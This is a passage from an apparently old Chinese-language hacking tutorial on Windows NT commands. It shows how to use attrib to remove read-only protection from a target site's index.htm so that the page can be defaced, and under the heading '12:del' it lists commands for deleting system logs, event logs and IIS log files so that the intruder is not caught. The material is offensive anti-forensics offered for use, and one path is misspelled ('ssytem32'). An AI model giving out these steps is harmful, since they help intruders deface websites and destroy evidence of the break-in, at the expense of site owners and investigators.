这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。  Attrib -r index.htm  这个命令是把index.htm的只读属性去掉。  如果把“-”改为“ ”则是把这个文件的属性设置为只读  ----------------------  attrib r index.htm  这个命令是把index.htm的属性设置为只读。  12:del  当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。  NT的日志有这些  del C:\winnt\system32\logfiles\*.*  del C:\winnt\ssytem32\config\*.evt  del C:\winnt\system32\dtclog\*.*  del C:\winnt\system32\*.log  del C:\winnt\system32\*.txt  del C:\winnt\*.txt  del C:\winnt\*.log  只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。